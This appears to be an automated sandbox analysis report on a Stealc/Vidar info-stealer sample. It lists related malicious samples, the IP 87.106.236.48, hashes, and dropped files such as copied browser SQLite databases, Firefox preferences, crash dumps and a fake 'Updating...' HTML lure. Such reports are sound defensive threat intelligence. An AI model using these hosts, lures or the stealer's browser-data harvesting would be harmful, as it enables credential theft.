                                                                                                                                                                                                                                                                                                            https://docs.google.com/drawings/d/1O7L6jnunpKYYRy1ZXX5DN4ENeZ4pxxWF8BG0mcDdFi0/preview?pli=1ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVenbNRU0UorX7OKjJa9aCYWGEkzuOVKWWWAgOafkEScU8ZjRsxVeGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                            • 4.175.87.197
                                                                                                                                                                                                                                                                                                            • 184.28.90.27
                                                                                                                                                                                                                                                                                                            • 13.107.246.60
                                                                                                                                                                                                                                                                                                            • 20.190.159.0
                                                                                                                                                                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19https://inspyrehomedesign.com/Ray-verify.htmlGet hashmaliciousNetSupport RATBrowse
                                                                                                                                                                                                                                                                                                            • 87.106.236.48
                                                                                                                                                                                                                                                                                                            setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            • 87.106.236.48
                                                                                                                                                                                                                                                                                                            setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                            • 87.106.236.48
                                                                                                                                                                                                                                                                                                            KTvTgKJSyw.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                            • 87.106.236.48
                                                                                                                                                                                                                                                                                                            XS_Trade_AI-newest_release_.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                                            • 87.106.236.48
                                                                                                                                                                                                                                                                                                            W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                            • 87.106.236.48
                                                                                                                                                                                                                                                                                                            Fa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                                                            • 87.106.236.48
                                                                                                                                                                                                                                                                                                            Lista produkt#U00f3w POL56583753Sarchmentdoc.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                                                                                                            • 87.106.236.48
                                                                                                                                                                                                                                                                                                            RFQ_List.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                                                            • 87.106.236.48
                                                                                                                                                                                                                                                                                                            rFa24c148.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                                                                                                                            • 87.106.236.48

                                                                                                                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                            C:\ProgramData\chrome.dllfile.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                KTvTgKJSyw.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                    W9f3Fx6sL4.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                      file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                              file.exeGet hashmaliciousStealc, VidarBrowse

                                                                                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\AEBGIEGC

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2648668336457682
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:8/2qOB1nxCkMbSAELyKOMq+8yC8F/YfU5m+OlTLVumK:Bq+n0Jb9ELyKOMq+8y9/OwN
                                                                                                                                                                                                                                                                                                                                MD5:C2440D636A51CB4BFE9F541584194A34
                                                                                                                                                                                                                                                                                                                                SHA1:2EA4E4D2DC97C1A4AF2A54F1300E03D8BB67830A
                                                                                                                                                                                                                                                                                                                                SHA-256:07352B585A47DBDCBD618919732F6BB59A6ED7FEB81A8E9F0E72BA7525E31BAC
                                                                                                                                                                                                                                                                                                                                SHA-512:7522DA64157503347BE93C4949BC3BD2D7DD495B4115B4C8E6FAEE0FF8CD0CA7D31F52EA6DEBC78B3DDE09EA38DFBD0AE1109717795137E35BFD8DFCA134DA59
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\BKEHDGDGHCBGCAKFIIIE

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):9504
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                                                                MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                                                                SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                                                                SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                                                                SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\BKFCBFCBFBKEBFIDBKEC

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\CFCGIIEH

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\CGIEBAFHJJDBGCAKJJKFBGCFIJ

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\ECAFHDBGHJ.exe

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):34449
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.0904488314057765
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:768:RFVlioXIwXk857yqPjrqIHWCsHxHG6LF2:RQMXL7yxxHG6F2
                                                                                                                                                                                                                                                                                                                                MD5:42260E5F2337549D914C02723EB07FE4
                                                                                                                                                                                                                                                                                                                                SHA1:95840AD9F159968EC34A0AA4584AFCE969F67EFC
                                                                                                                                                                                                                                                                                                                                SHA-256:6D878A094FAEB3D751599CCA45D092C911C9AE22810B208B5F245A3866D617DA
                                                                                                                                                                                                                                                                                                                                SHA-512:0C9B41AF4ECDA3BF802564B7D91FAA748DAC95DD7DA12AC84BFEC1622CAD5382F3B9ED26E7FC69718FB0CF0A0037E962F2346C59238EC937BDD68023FB1D0E76
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <title>Updating...</title>. <style>. @import url('https://fonts.googleapis.com/css2?family=PT+Sans:ital,wght@0,400;0,700;1,400;1,700&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap');.. h1 {. font-family: JuneBug;. }.. #file {. border-radius: 0px;. height: 5px;. margin-top: 20px;. margin-bottom: 20px;. }.. /* Default progress bar styles */. progress {. background-color: #d3dff5;. }.. progress::-webkit-progress-bar {. background-color: #d3dff5;. }.. progress::-webkit-progress-value {. background-color: #4285F4 !important;. }.. progress::-moz-progress-bar {. background-color: #4285F4 !important;. }.. #updating-block {. margin-left: 23%;.

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\EGDGIEGHJEGIDGCAFBFC

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\JKJKJJDBKEGIECAAECFHCFBGIJ

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\hwWxZRwpeL.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):5242880
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                                                                                                                MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                                                                                                                SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                                                                                                                SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                                                                                                                SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hwWxZRwpeL.exe_165b5c6447ae5a2d06083211747dcaa66839eb_0cfad76b_36c85020-d344-4202-9556-db4bd9a7e805\Report.wer

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.210841905406734
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:nOpHJst0zgkhZ7jxCZrMZpu3yzuiFgZ24IO8bK:msuzxhFjDeizuiFgY4IO8b
                                                                                                                                                                                                                                                                                                                                MD5:6E4F9272DC19C6C2ABE82B4FA9D585D1
                                                                                                                                                                                                                                                                                                                                SHA1:E9D0599F6004871321B1E0DEB3B7855E2EF30E87
                                                                                                                                                                                                                                                                                                                                SHA-256:CA8B3E13D9D83FB59875457E3E84E8BC9CED0A40E97F2CA34D0D47A1D6330525
                                                                                                                                                                                                                                                                                                                                SHA-512:525DD29704555C662D2233C1558F44888236CE072B6667494AD70B3CBE8FC812C29B9E5C2A7680AA9A4554ECE58FE76999375298459676D1420CBE276005D117
                                                                                                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.6.2.2.9.6.9.0.1.5.1.1.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.6.2.2.9.7.0.6.4.6.6.7.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.c.8.5.0.2.0.-.d.3.4.4.-.4.2.0.2.-.9.5.5.6.-.d.b.4.b.d.9.a.7.e.8.0.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.a.3.c.6.1.6.-.3.6.6.2.-.4.d.e.8.-.b.c.6.0.-.9.f.9.5.6.2.0.9.6.c.c.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.w.W.x.Z.R.w.p.e.L...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.e.0.-.0.0.0.1.-.0.0.1.4.-.e.6.e.e.-.b.c.a.0.7.c.2.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.9.6.a.e.d.4.9.0.0.9.d.b.1.b.3.e.d.c.c.d.f.0.6.d.2.c.8.3.c.c.8.0.0.0.0.f.f.f.f.!.0.0.0.0.3.3.5.a.1.7.6.6.4.b.7.7.c.1.1.0.d.a.2.d.5.f.f.2.e.d.e.b.b.5.5.7.b.1.f.c.2.0.3.2.!.h.w.W.x.Z.R.w.p.e.L...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER9890.tmp.dmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Mon Oct 28 21:02:50 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):75056
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):2.6810009388193117
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:EdtkMU6sTsEKVFzgSqBzRLm4zQPYbLz6LKnwsm:EdOMVsTsEYOTFIYbLKKnv
                                                                                                                                                                                                                                                                                                                                MD5:F1199DCAED1B63E495965850CDDC4441
                                                                                                                                                                                                                                                                                                                                SHA1:31B0681D62ED5F6B0DE56535D0AE1BD28A953027
                                                                                                                                                                                                                                                                                                                                SHA-256:3BFFA8FAD7D9F33288A791159CCF2164143BE1CE437BD066A35DF7A338E17EA1
                                                                                                                                                                                                                                                                                                                                SHA-512:90699D9EDD8D85D4441AC9FA53F6388DD84E597BE7C81B72FB2BD5BF69783A912903AE1FCFC15CD99141EA284B609F118A0940EF342B52FDA50F1EF1135C0F59
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:MDMP..a..... ..........g............4............%..<...........`?..........T.......8...........T...........X{..............,..........................................................................................eJ......P/......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CF6.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8346
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.703632532281367
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJuy6w6YEIWSU97+gmfnAV1pDm89bRvsf9bm:R6lXJT6w6YEpSU97+gmfngRUfc
                                                                                                                                                                                                                                                                                                                                MD5:7C9A955AC7BE6A625C28E96EEA692885
                                                                                                                                                                                                                                                                                                                                SHA1:7EFED695B3F0334A01D867F51C3AB60416D87006
                                                                                                                                                                                                                                                                                                                                SHA-256:69F507CD394C8BB1665038729A668A9C88648F37346E2426D4D021322DFB9939
                                                                                                                                                                                                                                                                                                                                SHA-512:86C900C611FA2C5FC536F3367ACBF4EA98DBB4077D16C3A710F7D70C728176101867D5958FC8BDF45387DF2C9918A24DE608B2042BECD93B8C6AF0AABCF04A01
                                                                                                                                                                                                                                                                                                                                Malicious:false
